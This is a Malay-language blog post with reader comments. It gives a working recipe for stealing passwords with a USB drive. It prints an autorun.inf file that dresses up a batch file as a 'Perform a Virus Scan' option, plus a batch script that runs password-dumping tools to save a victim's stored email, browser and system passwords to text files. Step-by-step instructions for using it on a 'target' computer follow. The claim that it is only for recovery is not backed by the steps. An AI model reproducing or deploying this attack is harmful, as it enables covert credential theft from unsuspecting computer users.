Hack Menggunakan Pendrive





Assalamualaikum...
Hari ni Admin akan berkongsi dengan korang bagaimana untuk hack password komputer
sesiapa dalam mase yang sangat singkat.. keh3..

Korang download semua yang kat bawah ni


Korang buka notepad dan korang copy dan paste kod yang aku bagi korang kat bawah ni.

[autorun]
open=pensil.bat
ACTION= Perform a Virus Scan
 

save serta namakan sebagai autorun.inf

Selepas save korang bula notepad baru masukkan kod kat bawah ni pulak

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Dan simpan sebagai pensil.bat  dan save didalam pendrive korang..
sekarang korang dah boleh akses password orang.

Step1. Masukkan ke komputer target..

Step2.  Popup window akan keluar. dan pilih option pertama (Perform a Virus Scan).

Step3. Sekarang semua password target akan tersimmpan di fail .txt.

Step4  Tanggalkan pendrive dari komputer target. dan korang dapat lihat password  pada fail .txt

Note: Trick ini hanya untuk recover balik password2 yang tersimpan dalam mana-mana komputer  
akan berkesan pada Windows 2000, XP and Vista sahaja window lain skill lain la keh3..

4 comments:

Tanpa Nama berkata...

Mantap oo ... Windows 7 Mcm Na ya?? Thnx $hare ..

Tanpa Nama berkata...

boleh ajar hack crack password wifi tak,, plzz

Anonymous berkata...

untuk windows 7 x de ke..

Blogger berkata...

Are you making money from your exclusive file uploads?
Did you know that Mgcash will pay you an average of $500 per 1,000 unlocks?

Catat Ulasan